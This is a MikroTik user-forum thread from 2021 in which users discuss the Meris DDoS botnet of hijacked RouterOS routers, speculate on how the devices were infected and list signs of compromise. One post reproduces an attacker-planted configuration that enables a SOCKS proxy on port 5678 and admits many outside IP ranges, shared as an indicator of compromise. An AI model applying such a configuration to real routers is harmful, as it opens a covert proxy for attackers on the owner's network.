Community discussions

MikroTik App
 
R1CH
Forum Guru
Forum Guru
Topic Author
Posts: 1098
Joined: Sun Oct 01, 2006 11:44 pm

200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 6:21 pm

Looks like there is a new DDoS botnet on the loose, comprised of Mikrotik devices.
We do not know precisely what particular vulnerabilities lead to the situation where Mikrotik devices are being compromised on such a large scale. Several records at the Mikrotik forum indicate that its customers experienced hacking attempts on older versions of RouterOS, particularly 6.40.1 from 2017. If this is correct and we see that old vulnerability still being active on thousands of devices being unpatched and unupgraded, this is horrible news. However, our data with Yandex indicates that this is not true – because the spectrum of RouterOS versions we see across this botnet varies from years old to recent. The largest share belongs to the version of firmware previous to the current Stable one.
https://blog.qrator.net/en/meris-botnet ... ecord_142/

This is scary - how are devices running 6.48.3 being infected? If there was a weak admin password and no firewall I could understand them being compromised, but the attacker should still be limited to boring things like running proxies and VPNs and whatever other functions exist in RouterOS. A scripted fetch attack also wouldn't generate such high levels of traffic, the fact that they can be used for a DDoS with a HTTP pipelining attack implies that the device has been rooted to run arbitrary code which shouldn't be possible with modern RouterOS versions. Is there a new exploit going around?

Image
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 6:30 pm

One simple thing: NAT

If one internal non-MikroTik device are infected, this appear coming from the Router....
How many % of the case are not involved at all the Router???
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 18958
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 6:39 pm

Perhaps related to the recent blocking of the MT cloud service??
 
User avatar
Paternot
Forum Veteran
Forum Veteran
Posts: 953
Joined: Thu Jun 02, 2016 4:01 am
Location: Niterói / Brazil

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 6:53 pm

This is scary - how are devices running 6.48.3 being infected?
Maybe they were infected earlier, and just upgraded without netinstall?
 
User avatar
Anastasia
Frequent Visitor
Frequent Visitor
Posts: 55
Joined: Wed Oct 28, 2015 7:12 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 9:06 pm

what are the signs that the device is infected?
for example: the presence of extraneous scripts, the presence of a new user who was recently created or something else?
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 9:09 pm

Usuallu Socks open, and script on scheduler, some download files on flies or files undeletable, vpn, etc.
 
User avatar
jspool
Member
Member
Posts: 468
Joined: Sun Oct 04, 2009 4:06 am
Location: Oregon

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 4:56 am

The instances I have seen are from poor password and update policies as well as not limiting management access to the routers. Some had old RouterOS versions that were exploited and the user/pass was obtained and used on other Mikrotik routers that were running newer versions but utilizing the same user/pass.

Example of one that was compromised:
/ip socks
set enabled=yes max-connections=500 port=5678
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
add src-address=213.33.214.0/24
add src-address=31.172.128.45
add src-address=31.172.128.25
add src-address=10.0.0.0/8
add src-address=185.137.233.251
add src-address=5.9.163.16/29
add src-address=176.9.65.8
add src-address=82.202.248.5
add src-address=95.213.193.133
add src-address=136.243.238.211
add src-address=178.238.114.6
add src-address=46.148.232.205
add src-address=138.201.170.176/29
add src-address=178.63.52.200/29
add src-address=136.243.90.80/29
add src-address=136.243.21.232/29
add src-address=95.213.221.0/24
add src-address=159.255.24.0/24
add src-address=31.184.210.0/24
add src-address=188.187.119.0/24
add src-address=188.233.1.0/24
add src-address=188.233.5.0/24
add src-address=188.233.13.0/24
add src-address=188.232.101.0/24
add src-address=188.232.105.0/24
add src-address=188.232.109.0/24
add src-address=176.212.165.0/24
add src-address=176.212.169.0/24
add src-address=176.212.173.0/24
add src-address=176.213.161.0/24
add src-address=176.213.165.0/24
add src-address=176.213.169.0/24
add src-address=5.3.113.0/24
add src-address=5.3.117.0/24
add src-address=5.3.121.0/24
add src-address=5.3.145.0/24
add src-address=5.3.149.0/24
add src-address=5.3.153.0/24
add src-address=5.167.9.0/24
add src-address=5.167.13.0/24
add src-address=5.167.17.0/24
add src-address=94.180.1.0/24
add src-address=94.180.5.0/24
add src-address=94.180.9.0/24
add src-address=217.119.22.83
add src-address=192.243.53.0/24
add src-address=192.243.55.0/24
add src-address=176.9.65.8
add src-address=135.181.15.102
add src-address=198.18.0.0/15
add src-address=139.99.94.160/29
add src-address=5.188.119.191
add src-address=178.63.52.202
add src-address=136.243.21.233
add src-address=136.243.90.81
add src-address=94.130.223.9
add action=deny src-address=0.0.0.0/0
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 7:25 am

Ah, so the hackers use socks, that's why it's still in RouterOS.
 
mkamenjak
newbie
Posts: 41
Joined: Tue Jul 13, 2021 12:49 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 9:23 am

Perhaps future routeros versions should separate socks into a separate package. I mean in my thousands of mikrotiks that I have logged in into, the only time I have seen it being used was on routers that were previously hacked.
 
mkamenjak
newbie
Posts: 41
Joined: Tue Jul 13, 2021 12:49 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 9:23 am

what are the signs that the device is infected?
for example: the presence of extraneous scripts, the presence of a new user who was recently created or something else?
Check for scripts, schedulers, and if IP socks was used.
 
JelleM
just joined
Posts: 10
Joined: Fri Aug 31, 2018 1:33 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 10:27 am

What worries me is that they all seem to have port 2000 open (Bandwidth Test Server), that could be either an infection vector (vulnerability in implementation) or because of a lacking default firewall (btest server is running by default).

Who is online

Users browsing this forum: Bing [Bot], holvoetn and 83 guests